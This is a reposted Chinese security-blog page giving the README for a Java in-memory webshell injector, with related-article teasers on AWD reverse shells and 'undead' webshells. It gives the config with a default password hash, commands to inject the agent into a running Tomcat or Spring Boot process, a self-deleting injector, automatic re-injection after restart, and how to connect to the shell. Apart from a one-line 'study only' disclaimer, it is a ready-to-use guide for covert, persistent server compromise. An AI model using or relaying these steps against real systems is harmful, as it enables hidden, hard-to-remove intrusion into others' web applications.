Java内存马注入工具

VSole2022-01-16 06:57:58
一个可以复活的Java内存马

用法

1.先根据环境修改配置文件

配置文件位置在: agent_starter.jar内部config目录下
# 目标url IP地址可以是127.0.0.1。在web应用关闭时,会挂起一个新进程用于监听。当web应用重新启动后,会自动重新注入。
target_url=http://127.0.0.1:80/
# 连接密码的md5值 默认密码:Jundead
password=AC9A489BB6873C5FB760370FD62A793E
# 调试模式 开启后会在当前目录创建日志文件,也会在目标web服务中打印少量日志信息。
debug=false

2.列出Java进程列表

java -jar agent_starter.jar list

3.根据进程名注入

java -jar agent_starter.jar
举例:java -jar agent_starter.jar "SpringbootDemo.jar" 9
注入进程的displayName是SpringbootDemo.jar,使用的tomcat_version是9。
PS: tomcat容器的进程名一般是:"org.apache.catalina.startup.Bootstrap start"
注入成功后会自动删除自身。

4.连接webshell

浏览器访问http://x.x.x.x/xxx?password=密码

FAQ

  • 注入成功了,但webshell不生效?
如果注入目标是Tomcat容器的应用,连接webshell的url必须是能够正常访问的url。如果注入目标是springboot框架应用,连接webshell的url可以是任意url。

Disclaimers

该项目仅供学习、研究之用,禁止用于非法用途。

urlwebshell
本作品采用《CC 协议》,转载必须注明作者和本文链接
接到一个紧急测试任务,只有一个目标名称和一个ip。这样的话webshellurl就无法正常访问了)带上cookie即可正常连接。连接成功后,为了稳定webshell,我们尝试将webshell写入到根目录和静态文件的目录,但是仍会受到强制跳转的影响。于是将webshell内容写入到了在登陆前就能访问的jsp正常文件中,来稳定shell。
一文看懂内存马
2022-01-02 22:31:21
它负责处理用户的请求,并根据请求生成相应的返回信息提供给用户。业务逻辑处理完成之后,返回给Servlet容器,然后容器将结果返回给客户端。Filter对象创建后会驻留在内存,当web应用移除或服务器停止时才销毁。该方法在Filter的生命周期中仅执行一次。
Java内存马注入工具
2022-01-16 06:57:58
一个可以复活的Java内存马 用法 1.先根据环境修改配置文件 配置文件位置在: agent_starter.jar内部config目录下 # 目标url IP地址可以是127.0.0.1。在web应用关闭时,会挂起一个新进程用于监听。当web应用重新启动后,会自动重新注入。 target_url=http://127.0.0.1:80/ # 连接密码的md5值 默认密码:Jundead pas
情景一 默认SSH密码批量反弹shell 情景二 dump源码 情景三 利用shell批量getflag 情景四 批量利用一句话木马种植不死马 最近工作很忙 今天抽空准备下AWD比赛得攻防工具和脚本 以下只是常用 希望下周不被吊锤~~ 后续整理后想抽空写成一个攻击框架汇总放github~~ 这里从各种情景和需求中去总结工具和脚本的使用
前言: 此次渗透中的所有修改已经复原,且漏洞已经提交至cnvd平台 源码泄露 在一个月黑风高的夜晚,闲来无事的我又开着脚本利用hunter进行互联网站点源码的扫描 在查看备份文件扫描结果时,看到了宝贝
0x01 前言在上一篇文章中深入浅出内存马(一),我介绍了基于Tomcat的Filter内存马,不光是Fil
云函数简介 云函数是腾讯云为企业和开发者们提供的无服务器执行环境,可以无需购买和管理服务器的情况下运行代码。只需使用平台支持的语言编写核心代码并设置代码运行的条件,即可在腾讯云基础设施上弹性、安全地运行代码。SCF是实时文件处理和数据处理等场景下理想的计算平台。服务端配置云函数基础配置选择自定义创建,地域自选,部署模式,代码部署,运行环境Python3.6,其余默认即可。
用户名:加密密码:密码最后一次修改日期:两次密码的修改时间间隔:密码有效期:密码修改到期到的警告天数:密码过期之后的宽限天数:账号失效时间:保留。查看下pid所对应的进程文件路径,
环境搭建完成后,直接使用工具检测即可:工具下载地址https://cdn.vulhub.org/deserialization/DeserializeExploit.jar 环境启动以后,直接访问http://you-ip:8080。
VSole
网络安全专家